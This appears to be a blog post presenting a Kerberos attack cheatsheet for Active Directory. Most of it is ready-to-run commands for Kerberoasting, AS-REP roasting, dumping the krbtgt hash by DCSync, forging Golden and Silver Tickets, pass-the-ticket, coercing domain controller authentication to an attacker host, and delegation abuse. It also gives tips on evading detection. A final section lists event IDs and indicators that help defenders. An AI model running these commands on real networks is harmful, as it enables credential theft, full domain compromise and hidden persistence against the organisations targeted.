AD Cheatsheet: Kerberos Attacks

Kerberos is the default authentication protocol in Active Directory, and its misconfigurations are among the most exploited vectors in real-world engagements. This post covers every major Kerberos attack technique with ready-to-use commands for both Linux and Windows. Each section includes enumeration, exploitation, and cracking steps.

Quick Reference Table

Attack	Requires	Impact	Linux Tool	Windows Tool
Kerberoasting	Domain user	Service account passwords	`GetUserSPNs.py`	`Rubeus kerberoast`
AS-REP Roasting	Username list (or domain user)	Passwords of no-preauth accounts	`GetNPUsers.py`	`Rubeus asreproast`
Golden Ticket	krbtgt NTLM hash	Full domain compromise	`ticketer.py`	`mimikatz`
Silver Ticket	Service/machine NTLM hash	Access to specific service	`ticketer.py`	`mimikatz`
Pass-the-Ticket	Stolen TGT/TGS	Lateral movement	`export KRB5CCNAME`	`Rubeus ptt`
Unconstrained Delegation	Compromised delegation host	Capture TGTs (including DC)	`krbrelayx.py`	`Rubeus monitor`
Constrained Delegation	Compromised delegation account	Impersonate any user to allowed SPN	`getST.py`	`Rubeus s4u`
RBCD	Write on computer object	Impersonate any user to target	`rbcd.py` + `getST.py`	`PowerMad` + `Rubeus s4u`

1. Kerberoasting

Request TGS tickets for accounts with SPNs, then crack them offline. Service accounts frequently have weak passwords.

Enumeration

Find accounts with SPNs set (Kerberoastable targets).

# Impacket - list kerberoastable users
GetUserSPNs.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>

# PowerView
Import-Module .\PowerView.ps1
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname

# Manual LDAP query
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$search.FindAll() | ForEach-Object { $_.Properties["samaccountname"] }

Exploitation

# Impacket - request TGS hashes
GetUserSPNs.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -outputfile kerberoast.txt

# With NTLM hash (pass-the-hash)
GetUserSPNs.py <DOMAIN>/<USER> -hashes :<NTHASH> -dc-ip <DC_IP> -request -outputfile kerberoast.txt

# Rubeus - request all kerberoastable hashes
.\Rubeus.exe kerberoast /outfile:kerberoast.txt

# Rubeus - target specific user
.\Rubeus.exe kerberoast /user:<TARGET_USER> /outfile:kerberoast.txt

Cracking

# RC4 (etype 23) - fast
hashcat -m 13100 kerberoast.txt /path/to/wordlist.txt

# AES-256 (etype 18) - slower but sometimes required
hashcat -m 19700 kerberoast.txt /path/to/wordlist.txt

# AES-128 (etype 17)
hashcat -m 19600 kerberoast.txt /path/to/wordlist.txt

Tip: RC4 encryption in Kerberos is a red flag for defenders. Modern environments enforce AES, which is significantly slower to crack. If you only get AES tickets, allocate more cracking time or use targeted rules.

2. AS-REP Roasting

Accounts with "Do not require Kerberos preauthentication" enabled will return an encrypted TGT without proving identity. Crack it offline.

Find Targets

# With domain credentials (auto-enumerates vulnerable accounts)
GetNPUsers.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>

# Without credentials (need a username list)
GetNPUsers.py <DOMAIN>/ -usersfile users.txt -no-pass -dc-ip <DC_IP>

# PowerView
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | Select-Object samaccountname

Exploitation

# Request AS-REP hashes
GetNPUsers.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -outputfile asrep.txt

# Without credentials
GetNPUsers.py <DOMAIN>/ -usersfile users.txt -no-pass -dc-ip <DC_IP> -outputfile asrep.txt

# Rubeus
.\Rubeus.exe asreproast /outfile:asrep.txt

# Target specific user
.\Rubeus.exe asreproast /user:<TARGET_USER> /outfile:asrep.txt

Cracking

hashcat -m 18200 asrep.txt /path/to/wordlist.txt

3. Golden Ticket

Forge a TGT using the krbtgt account hash. This grants unrestricted access to every service in the domain and is primarily used for persistence.

Prerequisites

You need all four of these:

Domain name (FQDN)
Domain SID
Username to impersonate (typically Administrator)
NTLM hash of the krbtgt account

Obtaining the krbtgt Hash

Requires DCSync privileges (Replicating Directory Changes + Replicating Directory Changes All) or Domain Admin.

# Impacket - DCSync
secretsdump.py <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user krbtgt

# Mimikatz - DCSync
mimikatz # lsadump::dcsync /user:krbtgt /domain:<DOMAIN>

# Get Domain SID
Import-Module .\PowerView.ps1
Get-DomainSID

Forging the Ticket

# Impacket - generate golden ticket
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> Administrator

# Use it
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass <DOMAIN>/administrator@<DC_FQDN>
secretsdump.py -k -no-pass <DC_FQDN>

# Mimikatz - forge and inject
mimikatz # kerberos::golden /domain:<DOMAIN> /user:Administrator /sid:<DOMAIN_SID> /rc4:<KRBTGT_HASH> /ptt

# Mimikatz - save to file
mimikatz # kerberos::golden /domain:<DOMAIN> /user:Administrator /sid:<DOMAIN_SID> /rc4:<KRBTGT_HASH> /ticket:golden.kirbi

# Verify
klist

# Use
dir \\<DC_FQDN>\c$
Enter-PSSession <DC_HOSTNAME>

Tip: Golden Tickets survive password resets of every account EXCEPT krbtgt. The krbtgt password must be reset twice (it keeps one previous key) to invalidate all Golden Tickets. This is why Golden Tickets are the ultimate persistence mechanism.

4. Silver Ticket

Forge a TGS for a specific service using the service or machine account hash. More stealthy than Golden Tickets because they never touch the DC for validation.

Prerequisites

Domain SID
NTLM hash of the service or machine account
Target SPN
Username to impersonate

Common SPNs for Silver Tickets

SPN	Access Gained
`CIFS/host`	SMB file system access
`HTTP/host`	WinRM / PSRemoting
`HOST/host`	PsExec, scheduled tasks
`LDAP/host`	DCSync (if target is a DC)
`MSSQL/host`	SQL Server access
`TERMSRV/host`	RDP access

Forging the Ticket

# Impacket - forge silver ticket for CIFS
ticketer.py -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
  -spn CIFS/<TARGET_FQDN> Administrator

export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass <TARGET_FQDN>

# Mimikatz - CIFS silver ticket with injection
mimikatz # kerberos::golden /domain:<DOMAIN> /user:Administrator /sid:<DOMAIN_SID> /rc4:<MACHINE_HASH> /target:<TARGET_FQDN> /service:cifs /ptt

# Access the target
dir \\<TARGET_FQDN>\c$

Sacrificial Process (avoid overwriting legitimate tickets)

# Create isolated logon session
.\Rubeus.exe createnetonly /program:cmd.exe /show

# Import ticket in the new window
.\Rubeus.exe ptt /ticket:silver.kirbi

Tip: A Silver Ticket for LDAP/dc.domain.local on a DC gives you DCSync capabilities without needing DCSync ACL permissions. This is a powerful escalation path when you have a DC machine account hash.

5. Pass-the-Ticket

Steal a TGT or TGS from another user's session and reuse it for lateral movement.

Windows - Extract and Inject

# List all accessible tickets
.\Rubeus.exe triage

# Dump a specific ticket by LUID
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

# Inject a ticket (base64 or .kirbi)
.\Rubeus.exe ptt /ticket:<BASE64_TICKET>
.\Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

Linux - Use .ccache Files

# Set the ticket
export KRB5CCNAME=./user.ccache

# Use with any Impacket tool
psexec.py -k -no-pass <DOMAIN>/<USER>@<TARGET_FQDN>
wmiexec.py -k -no-pass <DOMAIN>/<USER>@<TARGET_FQDN>
smbclient.py -k -no-pass <TARGET_FQDN>
evil-winrm -i <TARGET_FQDN> -r <DOMAIN>

Convert Between Formats

# .kirbi (Windows) to .ccache (Linux)
ticketConverter.py ticket.kirbi ticket.ccache

# .ccache to .kirbi
ticketConverter.py ticket.ccache ticket.kirbi

Tip: Always use a sacrificial process (Rubeus createnetonly) on Windows before injecting tickets. Injecting into your current session can overwrite legitimate tickets and break existing service connections.

6. Unconstrained Delegation

Hosts with unconstrained delegation store a copy of the authenticating user's TGT in memory. Compromise the host, capture TGTs, and impersonate those users (including domain controllers via the Printer Bug).

Enumeration

# Impacket - find delegation configurations
findDelegation.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>

# PowerView - computers with unconstrained delegation
Import-Module .\PowerView.ps1
Get-DomainComputer -Unconstrained | Select-Object samaccountname, dnshostname

# Users with unconstrained delegation
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"

Tip: Domain Controllers always have unconstrained delegation. Filter them out when looking for exploitable targets.

Exploitation - Printer Bug (Coerce DC Authentication)

The Printer Bug forces a remote host (typically the DC) to authenticate back to you, sending its TGT.

Windows (from compromised unconstrained delegation host):

# Terminal 1: Monitor for incoming TGTs
.\Rubeus.exe monitor /interval:5 /nowrap

# Terminal 2: Trigger DC authentication via Printer Bug
.\SpoolSample.exe <DC_FQDN> <COMPROMISED_HOST_FQDN>

# When Rubeus captures the DC$ TGT:
.\Rubeus.exe renew /ticket:<DC_TGT_BASE64> /ptt

# DCSync with the DC's TGT
mimikatz # lsadump::dcsync /user:krbtgt

Linux:

# 1. Start krbrelayx listener (decrypts with compromised account hash)
sudo krbrelayx.py -hashes :<COMPROMISED_ACCOUNT_HASH>

# 2. Trigger DC authentication
printerbug.py <DOMAIN>/<USER>:<PASS>@<DC_IP> <ATTACKER_HOST>

# 3. Use captured DC TGT
export KRB5CCNAME=./DC01\$@DOMAIN.LOCAL_krbtgt@DOMAIN.LOCAL.ccache
secretsdump.py -k -no-pass <DC_FQDN>

7. Constrained Delegation

Accounts with constrained delegation can impersonate users ONLY to specific SPNs (defined in msDS-AllowedToDelegateTo). With Protocol Transition (S4U2Self), the account can impersonate any user without their interaction.

Enumeration

findDelegation.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
# Look for "Constrained w/ Protocol Transition" (most exploitable)

# PowerView
Import-Module .\PowerView.ps1
Get-DomainComputer -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto

Exploitation

# getST.py handles S4U2Self + S4U2Proxy automatically
getST.py -spn <ALLOWED_SPN> '<DOMAIN>/<DELEGATION_ACCOUNT>:<PASS>' -impersonate Administrator -dc-ip <DC_IP>

# Use the ticket
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass <DOMAIN>/administrator@<TARGET_FQDN>

# Rubeus - S4U chain
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:<ALLOWED_SPN> /altservice:cifs /user:<DELEGATION_ACCOUNT> /rc4:<ACCOUNT_HASH> /ptt

# Access target
dir \\<TARGET_FQDN>\c$
Enter-PSSession <TARGET_HOSTNAME>

SPN Swap Trick

The SPN in the AP-REQ is not part of the encrypted ticket data. You can change the service name to access different services on the same host.

# Request ticket for TERMSRV but use it for CIFS
getST.py -spn TERMSRV/<TARGET> '<DOMAIN>/<ACCOUNT>:<PASS>' -impersonate Administrator
# Impacket automatically swaps to CIFS when using psexec.py

Tip: Useful service swaps: TERMSRV to CIFS, HTTP to CIFS, WWW to HOST. The swap works because all services on the same host share the machine account key.

8. Resource-Based Constrained Delegation (RBCD)

Unlike traditional constrained delegation (configured on the delegating account), RBCD is configured on the target computer via msDS-AllowedToActOnBehalfOfOtherIdentity. If you have write access to a computer object, you can configure RBCD on it.

Requirements

Write access on the target computer object (GenericWrite, GenericAll, WriteDacl, or WriteProperty on the specific attribute)
Control of an account with an SPN (a machine account works)

Exploitation - Standard (MachineAccountQuota >= 1)

# 1. Create a fake machine account
addcomputer.py -computer-name 'YOURPC$' -computer-pass 'Password123!' \
  -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASS>

# 2. Configure RBCD on the target
impacket-rbcd -delegate-from 'YOURPC$' -delegate-to '<TARGET_COMPUTER>$' -action write \
  <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>

# 3. Get ticket impersonating Administrator
getST.py -spn cifs/<TARGET_FQDN> -impersonate Administrator \
  -dc-ip <DC_IP> <DOMAIN>/'YOURPC$':'Password123!'

# 4. Use the ticket
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass <TARGET_FQDN>
wmiexec.py -k -no-pass <DOMAIN>/administrator@<TARGET_FQDN>

# 1. Create fake computer (Powermad)
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount YOURPC -Password $(ConvertTo-SecureString "Password123!" -AsPlainText -Force)

# 2. Configure RBCD (PowerView)
Import-Module .\PowerView.ps1
$ComputerSid = Get-DomainComputer YOURPC -Properties objectsid | Select-Object -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <TARGET> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# 3. Get hash and S4U
.\Rubeus.exe hash /password:Password123! /user:YOURPC$ /domain:<DOMAIN>
.\Rubeus.exe s4u /user:YOURPC$ /rc4:<HASH> /impersonateuser:administrator /msdsspn:cifs/<TARGET_FQDN> /ptt

Exploitation - SPN-less RBCD (MachineAccountQuota = 0)

When you cannot create machine accounts, use an existing user account with the U2U (User-to-User) extension.

# 1. Configure RBCD using a controlled user account (not a machine account)
impacket-rbcd -delegate-from <CONTROLLED_USER> -delegate-to '<TARGET_COMPUTER>$' -action write \
  <DOMAIN>/<ATTACKER_USER>:<PASS> -dc-ip <DC_IP>

# 2. S4U2Self (U2U) + S4U2Proxy
getST.py -u2u -impersonate Administrator -spn cifs/<TARGET_FQDN> \
  <DOMAIN>/<CONTROLLED_USER>:<PASS> -dc-ip <DC_IP>

# 3. Use the ticket
export KRB5CCNAME=./Administrator@cifs_<TARGET>.ccache
wmiexec.py -k -no-pass <DOMAIN>/administrator@<TARGET_FQDN>

Cleanup

# Remove RBCD configuration
impacket-rbcd -delegate-from 'YOURPC$' -delegate-to '<TARGET_COMPUTER>$' -action remove \
  <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>

# Windows cleanup
Get-DomainComputer <TARGET> | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity

Tip: Always clean up RBCD configurations after exploitation. The msDS-AllowedToActOnBehalfOfOtherIdentity attribute is commonly monitored by defenders and leaves a clear forensic trail.

9. Decision Tree - What to Use When

Use this decision flow to pick the right Kerberos attack based on what you currently have:

Do you have the krbtgt NTLM hash?

YES — Golden Ticket (full domain persistence)
NO — continue below

Do you have a service or machine account NTLM hash?

YES — Silver Ticket (targeted access to that service)
NO — continue below

Do you have a stolen TGT or TGS?

YES — Pass-the-Ticket (lateral movement)
NO — continue below

Do you have domain user credentials?

YES:
- Are there accounts with SPNs? — Kerberoasting (crack service passwords)
- Are there accounts without preauth? — AS-REP Roasting (crack those passwords)
- Is there delegation configured?
  - Unconstrained — Printer Bug + capture TGTs
  - Constrained w/ Protocol Transition — S4U chain
  - Write on computer object — RBCD
  - None — Look for ACL abuse paths instead
NO (no creds at all):
- Do you have a list of usernames? — AS-REP Roasting (no creds needed)
- No usernames — Kerbrute user enumeration first

10. Detection and Hardening Notes

Understanding what defenders look for helps you operate more carefully and helps blue teamers improve their monitoring.

Key Event IDs

Event ID	Description	Relevant Attack
4768	TGT requested (AS-REQ)	AS-REP Roasting, Golden Ticket
4769	TGS requested (TGS-REQ)	Kerberoasting, Silver Ticket
4770	TGS renewed	Pass-the-Ticket
4624	Successful logon	All ticket-based attacks
4672	Special privileges assigned	Golden Ticket, admin impersonation

Detection Indicators by Attack

Attack	What Gets Logged
Kerberoasting	Spike in 4769 events with RC4 encryption (etype 0x17) from a single source
AS-REP Roasting	4768 events for accounts that normally require preauth
Golden Ticket	4624 with blank Account Domain or FQDN instead of NetBIOS name
Silver Ticket	No DC-side logs (only on the target host) -- hardest to detect
Unconstrained Delegation	4624 type 3 from unexpected sources on delegation hosts
RBCD	Modification of `msDS-AllowedToActOnBehalfOfOtherIdentity` (4662)

Operational Considerations

Prefer AES over RC4 when possible. RC4 Kerberos requests are rare in modern environments and immediately flagged by most SIEMs.
Silver Tickets are the stealthiest ticket attack since validation happens at the target service, not the DC. No DC logs are generated.
Use sacrificial processes on Windows (Rubeus createnetonly) to avoid disrupting existing sessions.
Clean up after yourself: unset KRB5CCNAME on Linux, klist purge on Windows.
Golden Ticket longevity: by default, TGTs are valid for 10 hours and renewable for 7 days. Golden Tickets bypass these limits, but unusual ticket lifetimes are a detection vector.

What's Next

The next post in this series will cover ACL-based attacks, NTLM relay, and ADCS exploitation techniques.